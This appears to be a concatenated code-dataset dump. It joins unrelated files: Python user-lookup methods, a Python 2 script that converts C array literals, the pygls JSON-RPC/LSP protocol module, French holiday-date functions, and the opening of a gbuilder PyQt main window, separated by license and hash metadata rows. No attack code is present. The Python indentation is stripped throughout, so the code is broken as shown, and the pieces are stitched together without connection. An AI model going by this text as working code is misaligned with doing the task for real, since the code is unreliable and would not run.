@staticmethod
def get_user_by_email_address(email_address):
result = DBSession.query(UserModel).filter(UserModel.email_address == email_address).first()
obj = User()
obj.model = result
return obj
@staticmethod
def get_user_by_username(username):
result = DBSession.query(UserModel).filter(UserModel.username == username).first()
obj = User()
obj.model = result
return obj
@staticmethod
def get_user_by_identity(identity):
result = DBSession.query(UserModel).filter(OR(UserModel.username == identity, UserModel.email_address == identity, UserModel.uuid == identity)).first()
obj = User()
obj.model = result
return obj
@staticmethod
def get_users():
results = DBSession.query(UserModel).all()
objs = {}
for result in results:
objs[result.id] = User()
objs[result.id].model = result
return objs
@staticmethod
def create_user(username, email_address, password, is_active = True, is_deleted = False):
result = UserModel(uuid = str(uuid.uuid4()), email_address = email_address, username = username, password = password, is_active = is_active, is_deleted = is_deleted, create_date = datetime.utcnow(), update_date = datetime.utcnow())
DBSession.add(result)
obj = User()
obj.model = result
return obj
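# Usage sketch (illustrative values):
#   user = User.create_user('alice', 'alice@example.com', 'hashed-password')
#   same = User.get_user_by_username('alice')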
|
bsd-3-clause
| -2,055,657,441,272,897,500
| 35.557895
| 239
| 0.624532
| false
| 3.893498
| false
| false
| false
|
phate/jive
|
scripts/arrayliterals.py
|
1
|
2660
|
import re
import sys
# matches C compound-literal casts like "(int *[])"
r = re.compile('\\(([a-zA-Z0-9_*_ ]*)\\[\\]\\)')
def scan_stmt_starts(text):
starts = []
next_line_stmt = False
beginning_decl = False
nested_decls = set()
depth = 0
for n in range(len(text)):
c = text[n]
if c == '{':
if beginning_decl:
nested_decls.add(depth)
depth += 1
elif c == '}':
depth -= 1
if depth in nested_decls:
nested_decls.remove(depth)
elif c == '=':
beginning_decl = True
if c not in '= \t\n':
beginning_decl = False
if c == ';' or c == '{' or c == '}':
next_line_stmt = not bool(nested_decls)
elif c == '\n' and next_line_stmt:
starts.append((n + 1, get_indent(text, n + 1)))
next_line_stmt = False
else:
next_line_stmt = False
assert depth == 0
return starts
def get_indent(text, pos):
indent = ''
while pos < len(text) and text[pos] == '\t':
indent += text[pos]
pos += 1
return indent
#for start, indent in scan_stmt_starts(text):
#print '---'
#print indent, start
#print text[start:text.find('\n', start)]
def find_stmt_start(text, pos):
last_start, last_indent = 0, ''
for start, indent in scan_stmt_starts(text):
if start > pos:
return last_start, last_indent
last_start = start
last_indent = indent
return last_start, last_indent
def find_closing_brace(text, pos):
depth = 1
while depth > 0 and pos < len(text):
if text[pos] in '([{':
depth += 1
elif text[pos] in ')]}':
depth -= 1
pos += 1
return pos
def is_macro_def(text, pos):
while pos > 0:
if text[pos] == '#':
return True
elif text[pos] == '\n':
return False
else:
pos -= 1
return False
def convert_single(text, counter):
for m in r.finditer(text):
start, end = m.start(), m.end()
if is_macro_def(text, start):
continue
arraytype = m.group(1)
stmt_start, stmt_indent = find_stmt_start(text, start)
values_start = text.find('{', end)
values_end = find_closing_brace(text, values_start + 1)
values = text[values_start:values_end]
before_stmt = text[:stmt_start]
var = 'tmparray%d' % counter
inserted_tmp = stmt_indent + arraytype + ' ' + var + '[] = ' + values + ';\n'
remainder = text[stmt_start:start] + var + text[values_end:]
return text[:stmt_start] + inserted_tmp + remainder
return None
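# Illustrative transformation performed by convert_single:
#   foo((int *[]){&a, &b});
# becomes
#   int * tmparray0[] = {&a, &b};
#   foo(tmparray0);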
def convert_all(text):
counter = 0
while True:
new_text = convert_single(text, counter)
if not new_text: return text
text = new_text
counter += 1
filename = sys.argv[1]
text = file(filename).read()
new_text = convert_all(text)
if new_text != text:
sys.stderr.write(filename + '\n')
file(filename, 'w').write(new_text)
|
lgpl-2.1
| 9,154,337,267,762,679,000
| 20.803279
| 79
| 0.608271
| false
| 2.733813
| false
| false
| false
|
glenngillen/dotfiles
|
.vscode/extensions/ms-python.python-2021.5.842923320/pythonFiles/lib/jedilsp/pygls/protocol.py
|
1
|
29516
|
############################################################################
# Copyright(c) Open Law Library. All rights reserved. #
# See ThirdPartyNotices.txt in the project root for additional notices. #
# #
# Licensed under the Apache License, Version 2.0 (the "License") #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http: // www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
############################################################################
import asyncio
import enum
import functools
import json
import logging
import re
import sys
import traceback
import uuid
from collections import namedtuple
from concurrent.futures import Future
from functools import partial
from itertools import zip_longest
from typing import List
from pygls.capabilities import ServerCapabilitiesBuilder
from pygls.constants import ATTR_FEATURE_TYPE
from pygls.exceptions import (JsonRpcException, JsonRpcInternalError, JsonRpcInvalidParams,
JsonRpcMethodNotFound, JsonRpcRequestCancelled,
MethodTypeNotRegisteredError)
from pygls.feature_manager import (FeatureManager, assign_help_attrs, get_help_attrs,
is_thread_function)
from pygls.lsp import (JsonRPCNotification, JsonRPCRequestMessage, JsonRPCResponseMessage,
get_method_params_type, get_method_return_type, is_instance)
from pygls.lsp.methods import (CLIENT_REGISTER_CAPABILITY, CLIENT_UNREGISTER_CAPABILITY, EXIT,
TEXT_DOCUMENT_PUBLISH_DIAGNOSTICS, WINDOW_LOG_MESSAGE,
WINDOW_SHOW_MESSAGE, WORKSPACE_APPLY_EDIT, WORKSPACE_CONFIGURATION,
WORKSPACE_EXECUTE_COMMAND)
from pygls.lsp.types import (ApplyWorkspaceEditParams, ApplyWorkspaceEditResponse, Diagnostic,
DidChangeTextDocumentParams, DidChangeWorkspaceFoldersParams,
DidCloseTextDocumentParams, DidOpenTextDocumentParams,
ExecuteCommandParams, InitializeParams, InitializeResult,
LogMessageParams, MessageType, PublishDiagnosticsParams,
RegistrationParams, ShowMessageParams, UnregistrationParams,
WorkspaceEdit)
from pygls.uris import from_fs_path
from pygls.workspace import Workspace
logger = logging.getLogger(__name__)
def call_user_feature(base_func, method_name):
"""Wraps generic LSP features and calls user registered feature
immediately after it.
"""
@functools.wraps(base_func)
def decorator(self, *args, **kwargs):
ret_val = base_func(self, *args, **kwargs)
try:
user_func = self.fm.features[method_name]
self._execute_notification(user_func, *args, **kwargs)
except KeyError:
pass
except Exception:
logger.exception('Failed to handle user defined notification "%s": %s',
method_name, args)
return ret_val
return decorator
def dict_to_object(**d):
"""Create nested objects (namedtuple) from dict."""
type_name = d.pop('type_name', 'Object')
return json.loads(
json.dumps(d),
object_hook=lambda p: namedtuple(type_name, p.keys(), rename=True)(*p.values())
)
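# e.g. dict_to_object(a=1, b=2) yields a namedtuple-like Object with
# .a == 1 and .b == 2; nested dicts become nested objects via the object_hook.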
def default_serializer(o):
"""JSON serializer for complex objects."""
if isinstance(o, enum.Enum):
return o.value
return o.__dict__
def deserialize_command(params):
"""Function used to deserialize command arguments to a specific class
or a namedtuple."""
# TODO: Register/Look up custom command arguments' types
# Currently command parameters are type of 'any', but eventually we would
# want to register an argument type of our custom command and to
# deserialize it properly.
temp_obj = dict_to_object(**params, type_name='CommandParams')
params['arguments'] = getattr(temp_obj, 'arguments', None)
return params
def deserialize_params(data, get_params_type):
"""Function used to deserialize params to a specific class."""
try:
method = data['method']
params = data['params']
if not isinstance(params, dict):
return data
try:
params_type = get_params_type(method)
if params_type is None:
params_type = dict_to_object
elif params_type.__name__ == ExecuteCommandParams.__name__:
params = deserialize_command(params)
except MethodTypeNotRegisteredError:
params_type = dict_to_object
try:
data['params'] = params_type(**params)
except TypeError:
raise ValueError(
f'Could not instantiate "{params_type.__name__}" from params: {params}')
except KeyError:
pass
return data
def deserialize_message(data, get_params_type=get_method_params_type):
"""Function used to deserialize data received from client."""
if 'jsonrpc' in data:
try:
deserialize_params(data, get_params_type)
except ValueError:
raise JsonRpcInvalidParams()
if 'id' in data:
if 'method' in data:
return JsonRPCRequestMessage(**data)
else:
return JsonRPCResponseMessage(**data)
else:
return JsonRPCNotification(**data)
return data
def to_lsp_name(method_name):
"""Convert method name to LSP real name
Example:
text_document__did_open -> textDocument/didOpen
"""
method_name = method_name.replace('__', '/')
m_chars = list(method_name)
m_replaced = []
for i, ch in enumerate(m_chars):
if ch == '_':
continue
if m_chars[i - 1] == '_':
m_replaced.append(ch.capitalize())
continue
m_replaced.append(ch)
return ''.join(m_replaced)
class JsonRPCProtocol(asyncio.Protocol):
"""Json RPC protocol implementation using on top of `asyncio.Protocol`.
Specification of the protocol can be found here:
https://www.jsonrpc.org/specification
This class provides bidirectional communication which is needed for LSP.
"""
CANCEL_REQUEST = '$/cancelRequest'
CHARSET = 'utf-8'
CONTENT_TYPE = 'application/vscode-jsonrpc'
MESSAGE_PATTERN = re.compile(
rb'^(?:[^\r\n]+\r\n)*'
+ rb'Content-Length: (?P<length>\d+)\r\n'
+ rb'(?:[^\r\n]+\r\n)*\r\n'
+ rb'(?P<body>{.*)',
re.DOTALL,
)
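# A frame matched by MESSAGE_PATTERN looks like (illustrative):
#   Content-Length: 60\r\n
#   Content-Type: application/vscode-jsonrpc; charset=utf-8\r\n
#   \r\n
#   {"jsonrpc": "2.0", ...}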
VERSION = '2.0'
def __init__(self, server):
self._server = server
self._shutdown = False
self._client_request_futures = {}
self._server_request_futures = {}
self.fm = FeatureManager(server)
self.transport = None
self._message_buf = []
def __call__(self):
return self
def _check_ret_type_and_send_response(self, method_name, method_type, msg_id, result):
"""Check if registered feature returns appropriate result type."""
if method_type == ATTR_FEATURE_TYPE:
return_type = get_method_return_type(method_name)
if not is_instance(result, return_type):
error = JsonRpcInternalError().to_dict()
self._send_response(msg_id, error=error)
self._send_response(msg_id, result=result)
def _execute_notification(self, handler, *params):
"""Executes notification message handler."""
if asyncio.iscoroutinefunction(handler):
future = asyncio.ensure_future(handler(*params))
future.add_done_callback(self._execute_notification_callback)
else:
if is_thread_function(handler):
self._server.thread_pool.apply_async(handler, (*params, ))
else:
handler(*params)
def _execute_notification_callback(self, future):
"""Success callback used for coroutine notification message."""
if future.exception():
error = JsonRpcInternalError.of(sys.exc_info()).to_dict()
logger.exception('Exception occurred in notification: "%s"', error)
# Revisit. Client does not support response with msg_id = None
# https://stackoverflow.com/questions/31091376/json-rpc-2-0-allow-notifications-to-have-an-error-response
# self._send_response(None, error=error)
def _execute_request(self, msg_id, handler, params):
"""Executes request message handler."""
method_name, method_type = get_help_attrs(handler)
if asyncio.iscoroutinefunction(handler):
future = asyncio.ensure_future(handler(params))
self._client_request_futures[msg_id] = future
future.add_done_callback(partial(self._execute_request_callback,
method_name, method_type, msg_id))
else:
# Can't be canceled
if is_thread_function(handler):
self._server.thread_pool.apply_async(
handler, (params, ),
callback=partial(
self._check_ret_type_and_send_response,
method_name, method_type, msg_id,
),
error_callback=partial(self._execute_request_err_callback, msg_id))
else:
self._check_ret_type_and_send_response(
method_name, method_type, msg_id, handler(params))
def _execute_request_callback(self, method_name, method_type, msg_id, future):
"""Success callback used for coroutine request message."""
try:
if not future.cancelled():
self._check_ret_type_and_send_response(
method_name, method_type, msg_id, result=future.result())
else:
self._send_response(
msg_id,
error=JsonRpcRequestCancelled(f'Request with id "{msg_id}" is canceled')
)
self._client_request_futures.pop(msg_id, None)
except Exception:
error = JsonRpcInternalError.of(sys.exc_info()).to_dict()
logger.exception('Exception occurred for message "%s": %s', msg_id, error)
self._send_response(msg_id, error=error)
def _execute_request_err_callback(self, msg_id, exc):
"""Error callback used for coroutine request message."""
exc_info = (type(exc), exc, None)
error = JsonRpcInternalError.of(exc_info).to_dict()
logger.exception('Exception occurred for message "%s": %s', msg_id, error)
self._send_response(msg_id, error=error)
def _get_handler(self, feature_name):
"""Returns builtin or used defined feature by name if exists."""
try:
return self.fm.builtin_features[feature_name]
except KeyError:
try:
return self.fm.features[feature_name]
except KeyError:
raise JsonRpcMethodNotFound.of(feature_name)
def _handle_cancel_notification(self, msg_id):
"""Handles a cancel notification from the client."""
future = self._client_request_futures.pop(msg_id, None)
if not future:
logger.warning('Cancel notification for unknown message id "%s"', msg_id)
return
# Will only work if the request hasn't started executing
if future.cancel():
logger.info('Cancelled request with id "%s"', msg_id)
def _handle_notification(self, method_name, params):
"""Handles a notification from the client."""
if method_name == JsonRPCProtocol.CANCEL_REQUEST:
self._handle_cancel_notification(params.id)
return
try:
handler = self._get_handler(method_name)
self._execute_notification(handler, params)
except KeyError:
logger.warning('Ignoring notification for unknown method "%s"', method_name)
except Exception:
logger.exception('Failed to handle notification "%s": %s', method_name, params)
def _handle_request(self, msg_id, method_name, params):
"""Handles a request from the client."""
try:
handler = self._get_handler(method_name)
# workspace/executeCommand is a special case
if method_name == WORKSPACE_EXECUTE_COMMAND:
handler(params, msg_id)
else:
self._execute_request(msg_id, handler, params)
except JsonRpcException as e:
logger.exception('Failed to handle request %s %s %s', msg_id, method_name, params)
self._send_response(msg_id, None, e.to_dict())
except Exception:
logger.exception('Failed to handle request %s %s %s', msg_id, method_name, params)
err = JsonRpcInternalError.of(sys.exc_info()).to_dict()
self._send_response(msg_id, None, err)
def _handle_response(self, msg_id, result=None, error=None):
"""Handles a response from the client."""
future = self._server_request_futures.pop(msg_id, None)
if not future:
logger.warning('Received response to unknown message id "%s"', msg_id)
return
if error is not None:
logger.debug('Received error response to message "%s": %s', msg_id, error)
future.set_exception(JsonRpcException.from_dict(error))
else:
logger.debug('Received result for message "%s": %s', msg_id, result)
future.set_result(result)
def _procedure_handler(self, message):
"""Delegates message to handlers depending on message type."""
if message.jsonrpc != JsonRPCProtocol.VERSION:
logger.warning('Unknown message "%s"', message)
return
if self._shutdown and getattr(message, 'method', '') != EXIT:
logger.warning('Server shutting down. No more requests!')
return
if isinstance(message, JsonRPCNotification):
logger.debug('Notification message received.')
self._handle_notification(message.method, message.params)
elif isinstance(message, JsonRPCResponseMessage):
logger.debug('Response message received.')
self._handle_response(message.id, message.result, message.error)
elif isinstance(message, JsonRPCRequestMessage):
logger.debug('Request message received.')
self._handle_request(message.id, message.method, message.params)
def _send_data(self, data):
"""Sends data to the client."""
if not data:
return
try:
body = data.json(by_alias=True, exclude_unset=True, encoder=default_serializer)
logger.info('Sending data: %s', body)
body = body.encode(self.CHARSET)
header = (
f'Content-Length: {len(body)}\r\n'
f'Content-Type: {self.CONTENT_TYPE}; charset={self.CHARSET}\r\n\r\n'
).encode(self.CHARSET)
self.transport.write(header + body)
except Exception:
logger.error(traceback.format_exc())
def _send_response(self, msg_id, result=None, error=None):
"""Sends a JSON RPC response to the client.
Args:
msg_id(str): Id from request
result(any): Result returned by handler
error(any): Error returned by handler
"""
response = JsonRPCResponseMessage(id=msg_id,
jsonrpc=JsonRPCProtocol.VERSION,
result=result,
error=error)
if error is None:
del response.error
else:
del response.result
self._send_data(response)
def connection_lost(self, exc):
"""Method from base class, called when connection is lost, in which case we
want to shutdown the server's process as well.
"""
logger.error('Connection to the client is lost! Shutting down the server.')
sys.exit(1)
def connection_made(self, transport: asyncio.BaseTransport):
"""Method from base class, called when connection is established"""
self.transport = transport
def data_received(self, data: bytes):
"""Method from base class, called when server receives the data"""
logger.debug('Received %r', data)
while len(data):
# Append the incoming chunk to the message buffer
self._message_buf.append(data)
# Look for the body of the message
message = b''.join(self._message_buf)
found = JsonRPCProtocol.MESSAGE_PATTERN.fullmatch(message)
body = found.group('body') if found else b''
length = int(found.group('length')) if found else 1
if len(body) < length:
# Message is incomplete; bail until more data arrives
return
# Message is complete;
# extract the body and any remaining data,
# and reset the buffer for the next message
body, data = body[:length], body[length:]
self._message_buf = []
# Parse the body
self._procedure_handler(
json.loads(body.decode(self.CHARSET),
object_hook=deserialize_message))
def notify(self, method: str, params=None):
"""Sends a JSON RPC notification to the client."""
logger.debug('Sending notification: "%s" %s', method, params)
request = JsonRPCNotification(
jsonrpc=JsonRPCProtocol.VERSION,
method=method,
params=params
)
self._send_data(request)
def send_request(self, method, params=None, callback=None):
"""Sends a JSON RPC request to the client.
Args:
method(str): The method name of the message to send
params(any): The payload of the message
Returns:
Future that will be resolved once a response has been received
"""
msg_id = str(uuid.uuid4())
logger.debug('Sending request with id "%s": %s %s', msg_id, method, params)
request = JsonRPCRequestMessage(
id=msg_id,
jsonrpc=JsonRPCProtocol.VERSION,
method=method,
params=params
)
future = Future()
# If callback function is given, call it when result is received
if callback:
def wrapper(future: Future):
result = future.result()
logger.info('Configuration for %s received: %s', params, result)
callback(result)
future.add_done_callback(wrapper)
self._server_request_futures[msg_id] = future
self._send_data(request)
return future
def send_request_async(self, method, params=None):
"""Calls `send_request` and wraps `concurrent.futures.Future` with
`asyncio.Future` so it can be used with `await` keyword.
Args:
method(str): The method name of the message to send
params(any): The payload of the message
Returns:
`asyncio.Future` that can be awaited
"""
return asyncio.wrap_future(self.send_request(method, params))
def thread(self):
"""Decorator that mark function to execute it in a thread."""
return self.fm.thread()
class LSPMeta(type):
"""Wraps LSP built-in features (`bf_` naming convention).
Built-in features cannot be overridden but user defined features with
the same LSP name will be called after them.
"""
def __new__(mcs, cls_name, cls_bases, cls):
for attr_name, attr_val in cls.items():
if callable(attr_val) and attr_name.startswith('bf_'):
method_name = to_lsp_name(attr_name[3:])
wrapped = call_user_feature(attr_val, method_name)
assign_help_attrs(wrapped, method_name, ATTR_FEATURE_TYPE)
cls[attr_name] = wrapped
logger.debug('Added decorator for lsp method: "%s"', attr_name)
return super().__new__(mcs, cls_name, cls_bases, cls)
class LanguageServerProtocol(JsonRPCProtocol, metaclass=LSPMeta):
"""A class that represents language server protocol.
It contains implementations for generic LSP features.
Attributes:
workspace(Workspace): In memory workspace
"""
def __init__(self, server):
super().__init__(server)
self.workspace = None
self._register_builtin_features()
def _register_builtin_features(self):
"""Registers generic LSP features from this class."""
for name in dir(self):
attr = getattr(self, name)
if callable(attr) and name.startswith('bf_'):
lsp_name = to_lsp_name(name[3:])
self.fm.add_builtin_feature(lsp_name, attr)
def apply_edit(self, edit: WorkspaceEdit, label: str = None) -> \
ApplyWorkspaceEditResponse:
"""Sends apply edit request to the client."""
return self.send_request(WORKSPACE_APPLY_EDIT,
ApplyWorkspaceEditParams(edit=edit, label=label))
def bf_exit(self, *args):
"""Stops the server process."""
self.transport.close()
sys.exit(0 if self._shutdown else 1)
def bf_initialize(self, params: InitializeParams):
"""Method that initializes language server.
It will compute and return server capabilities based on
registered features.
"""
logger.info('Language server initialized %s', params)
self._server.process_id = params.process_id
# Initialize server capabilities
self.client_capabilities = params.capabilities
self.server_capabilities = ServerCapabilitiesBuilder(
self.client_capabilities,
self.fm.features.keys(),
self.fm.feature_options,
list(self.fm.commands.keys()),
self._server.sync_kind,
).build()
logger.debug('Server capabilities: %s', self.server_capabilities.dict())
root_path = params.root_path
root_uri = params.root_uri or from_fs_path(root_path)
# Initialize the workspace
workspace_folders = params.workspace_folders or []
self.workspace = Workspace(root_uri, self._server.sync_kind, workspace_folders)
return InitializeResult(capabilities=self.server_capabilities)
def bf_initialized(self, *args):
"""Notification received when client and server are connected."""
pass
def bf_shutdown(self, *args):
"""Request from client which asks server to shutdown."""
for future in self._client_request_futures.values():
future.cancel()
for future in self._server_request_futures.values():
future.cancel()
self._shutdown = True
return None
def bf_text_document__did_change(self,
params: DidChangeTextDocumentParams):
"""Updates document's content.
(Incremental(from server capabilities); not configurable for now)
"""
for change in params.content_changes:
self.workspace.update_document(params.text_document, change)
def bf_text_document__did_close(self,
params: DidCloseTextDocumentParams):
"""Removes document from workspace."""
self.workspace.remove_document(params.text_document.uri)
def bf_text_document__did_open(self,
params: DidOpenTextDocumentParams):
"""Puts document to the workspace."""
self.workspace.put_document(params.text_document)
def bf_workspace__did_change_workspace_folders(
self,
params: DidChangeWorkspaceFoldersParams):
"""Adds/Removes folders from the workspace."""
logger.info('Workspace folders changed: %s', params)
added_folders = params.event.added or []
removed_folders = params.event.removed or []
for f_add, f_remove in zip_longest(added_folders, removed_folders):
if f_add:
self.workspace.add_folder(f_add)
if f_remove:
self.workspace.remove_folder(f_remove.uri)
def bf_workspace__execute_command(self,
params: ExecuteCommandParams,
msg_id):
"""Executes commands with passed arguments and returns a value."""
cmd_handler = self.fm.commands[params.command]
self._execute_request(msg_id, cmd_handler, params.arguments)
def get_configuration(self, params, callback):
"""Sends configuration request to the client.
Args:
params(dict): ConfigurationParams from lsp specs
callback(callable): Callable which will be called after
response from the client is received
Returns:
concurrent.futures.Future object that will be resolved once a
response has been received
"""
return self.send_request(WORKSPACE_CONFIGURATION, params, callback)
def get_configuration_async(self, params):
"""Calls `get_configuration` method but designed to use with coroutines
Args:
params(dict): ConfigurationParams from lsp specs
Returns:
asyncio.Future that can be awaited
"""
return asyncio.wrap_future(self.get_configuration(params, None))
def publish_diagnostics(self, doc_uri: str, diagnostics: List[Diagnostic]):
"""Sends diagnostic notification to the client."""
self.notify(TEXT_DOCUMENT_PUBLISH_DIAGNOSTICS,
PublishDiagnosticsParams(uri=doc_uri, diagnostics=diagnostics))
def register_capability(self, params: RegistrationParams, callback):
"""Register a new capability on the client.
Args:
params(RegistrationParams): RegistrationParams from lsp specs
callback(callable): Callable which will be called after
response from the client is received
Returns:
concurrent.futures.Future object that will be resolved once a
response has been received
"""
return self.send_request(CLIENT_REGISTER_CAPABILITY, params, callback)
def register_capability_async(self, params: RegistrationParams):
"""Register a new capability on the client.
Args:
params(RegistrationParams): RegistrationParams from lsp specs
Returns:
asyncio.Future object that will be resolved once a
response has been received
"""
return asyncio.wrap_future(self.register_capability(params, None))
def show_message(self, message, msg_type=MessageType.Info):
"""Sends message to the client to display message."""
self.notify(WINDOW_SHOW_MESSAGE, ShowMessageParams(type=msg_type, message=message))
def show_message_log(self, message, msg_type=MessageType.Log):
"""Sends message to the client's output channel."""
self.notify(WINDOW_LOG_MESSAGE, LogMessageParams(type=msg_type, message=message))
def unregister_capability(self, params: UnregistrationParams, callback):
"""Unregister a new capability on the client.
Args:
params(UnregistrationParams): UnregistrationParams from lsp specs
callback(callable): Callable which will be called after
response from the client is received
Returns:
concurrent.futures.Future object that will be resolved once a
response has been received
"""
return self.send_request(CLIENT_UNREGISTER_CAPABILITY, params, callback)
def unregister_capability_async(self, params: UnregistrationParams):
"""Unregister a new capability on the client.
Args:
params(UnregistrationParams): UnregistrationParams from lsp specs
Returns:
asyncio.Future object that will be resolved once a
response has been received
"""
return asyncio.wrap_future(self.unregister_capability(params, None))
|
mit
| 1,117,900,913,965,417,300
| 38.09404
| 117
| 0.599336
| false
| 4.543719
| true
| false
| false
|
simonpessemesse/seguinus
|
chambres/joursFerie.py
|
1
|
5799
|
#!/usr/bin/python
# -*- coding: iso-8859-1 -*-
def datepaques(an):
"""Calcule la date de Paques d'une annee donnee an (=nombre entier)"""
a = an // 100
b = an % 100
c = (3 * (a + 25)) // 4
d = (3 * (a + 25)) % 4
e = (8 * (a + 11)) // 25
f = (5 * a + b) % 19
g = (19 * f + c - e) % 30
h = (f + 11 * g) // 319
j = (60 * (5 - d) + b) // 4
k = (60 * (5 - d) + b) % 4
m = (2 * j - k - g + h) % 7
n = (g - h + m + 114) // 31
p = (g - h + m + 114) % 31
jour = p + 1
mois = n
return [jour, mois, an]
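# e.g. datepaques(2024) -> [31, 3, 2024] (Easter Sunday fell on 31 March 2024)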
def datechaine(d, sep='/'):
"""Transforme une date liste=[j,m,a] en une date chaîne 'jj/mm/aaaa'"""
return ("%02d" + sep + "%02d" + sep + "%0004d") % (d[0], d[1], d[2])
def dateliste(c, sep='/'):
"""Transforme une date chaîne 'j/m/a' en une date liste [j,m,a]"""
j, m, a = c.split(sep)
return [int(j), int(m), int(a)]
def jourplus(d, n=1):
"""Donne la date du nième jour suivant d=[j, m, a] (n>=0)"""
j, m, a = d
fm = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
if (a % 4 == 0 and a % 100 != 0) or a % 400 == 0:  # leap year?
fm[2] = 29
for i in range(0, n):
j += 1
if j > fm[m]:
j = 1
m += 1
if m > 12:
m = 1
a += 1
return [j, m, a]
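# e.g. jourplus([28, 2, 2024], 1) -> [29, 2, 2024] (2024 is a leap year)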
def jourmoins(d, n=-1):
"""Donne la date du nième jour précédent d=[j, m, a] (n<=0)"""
j, m, a = d
fm = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
if (a % 4 == 0 and a % 100 != 0) or a % 400 == 0:  # leap year?
fm[2] = 29
for i in range(0, abs(n)):
j -= 1
if j < 1:
m -= 1
if m < 1:
m = 12
a -= 1
j = fm[m]
return [j, m, a]
def numjoursem(d):
"""Donne le numero du jour de la semaine d'une date d=[j,m,a]
lundi=1, mardi=2, ..., dimanche=7
Algorithme de Maurice Kraitchik (1882–1957)"""
j, m, a = d
if m < 3:
m += 12
a -= 1
n = (j + 2 * m + (3 * (m + 1)) // 5 + a + a // 4 - a // 100 + a // 400 + 2) % 7
return [6, 7, 1, 2, 3, 4, 5][n]
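# e.g. numjoursem([1, 1, 2024]) -> 1 (1 January 2024 was a Monday)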
def joursem(d):
"""Donne le jour de semaine en texte a partir de son numero
lundi=1, mardi=2, ..., dimanche=7"""
return ["", "lundi", "mardi", "mercredi", "jeudi", "vendredi", "samedi",
"dimanche"][numjoursem(d)]
def joursferiesliste(an, sd=0):
"""Liste des jours feries France en date-liste de l'annee an (nb entier).
sd=0 (=defaut): tous les jours feries.
sd=1: idem sans les sammedis-dimanches.
sd=2: tous + les 2 jours feries supplementaires d'Alsace-Moselle.
sd=3: idem sd=2 sans les samedis-dimanches"""
F = []  # list of the holiday dates, as date-lists d=[j,m,a]
L = []  # list of the holiday labels
dp = datepaques(an)
# Jour de l'an
d = [1, 1, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Jour de l'an")
# Vendredi saint (pour l'Alsace-Moselle)
d = jourmoins(dp, -2)
if sd >= 2:
F.append(d)
L.append("Vendredi saint")
# Dimanche de Paques
d = dp
if (sd == 0) or (sd == 2):
F.append(d)
L.append("Dimanche de Paques")
# Lundi de Paques
d = jourplus(dp, +1)
F.append(d)
L.append("Lundi de Paques")
# Fete du travail
d = [1, 5, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Fete du travail")
# Victoire des allies 1945
d = [8, 5, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Victoire des allies 1945")
# Jeudi de l'Ascension
d = jourplus(dp, +39)
F.append(d)
L.append("Jeudi de l'Ascension")
# Dimanche de Pentecote
d = jourplus(dp, +49)
if (sd == 0) or (sd == 2):
F.append(d)
L.append("Dimanche de Pentecote")
# Lundi de Pentecote
d = jourplus(d, +1)
F.append(d)
L.append("Lundi de Pentecote")
# Fete Nationale
d = [14, 7, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Fete Nationale")
# Assomption
d = [15, 8, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Assomption")
# Toussaint
d = [1, 11, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Toussaint")
# Armistice 1918
d = [11, 11, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Armistice 1918")
# Jour de Noel
d = [25, 12, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Jour de Noel")
# Saint Etienne (pour l'Alsace-Moselle)
d = [26, 12, an]
nj = numjoursem(d)
if (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Saint Etienne")
return F, L
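# e.g. joursferiesliste(2024)[1] begins ["Jour de l'an", "Dimanche de Paques",
# "Lundi de Paques", ...]; sd=1 drops the holidays falling on a weekend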
def estferie(d, sd=0):
"""estferie(d,sd=0): => dit si une date d=[j,m,a] donnee est feriee France
si la date est feriee, renvoie son libelle
sinon, renvoie une chaine vide"""
j, m, a = d.day, d.month, d.year
F, L = joursferiesliste(a, sd)
for i in range(0, len(F)):
if j == F[i][0] and m == F[i][1] and a == F[i][2]:
return L[i]
return ""
|
gpl-2.0
| 4,589,852,060,434,486,000
| 27.24878
| 83
| 0.473493
| false
| 2.454854
| false
| false
| false
|
anrl/gini3
|
frontend/src/gbuilder/UI/MainWindow.py
|
1
|
59141
|
"""The main window for gbuilder 2.0"""
import os, time, math, subprocess, sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from DropBar import *
from LogWindow import *
from Canvas import *
from Node import *
from Edge import *
from Configuration import *
from Core.globals import *
import thread
import socket
import atexit
import fcntl
import struct
from ExportWindow import *
from SendDirectoryWindow import *
from Properties import *
from Systray import *
from Network.gclient import *
from Core.Compiler import *
from TabWidget import *
from Tutorial import *
from TaskManagerWindow import *
import Core.globals
from Wireless.ClientAPI import *
from Wireless.ServerAPI import *
class MainWindow(Systray):
def __init__(self,app):
"""
Create a main window for the application
"""
defaultOptions["palette"]=app.palette()
Systray.__init__(self)
self.expansions=0
self.client=None
self.server=None
self.wserverIP=None
self.wserverPort=None
self.wgini_client=None
self.wgini_server=None
self.running=False
self.recovery=False
mainWidgets["main"] = self
mainWidgets["app"] = app
self.canvas = Canvas(self)
mainWidgets["canvas"] = self.canvas
self.tabWidget = TabWidget(self)
mainWidgets["tab"] = self.tabWidget
self.setCentralWidget(self.tabWidget)
#self.setCentralWidget(self.canvas)
self.createActions()
self.createMenus()
self.createToolBars()
self.createStatusBar()
self.createDockWindows()
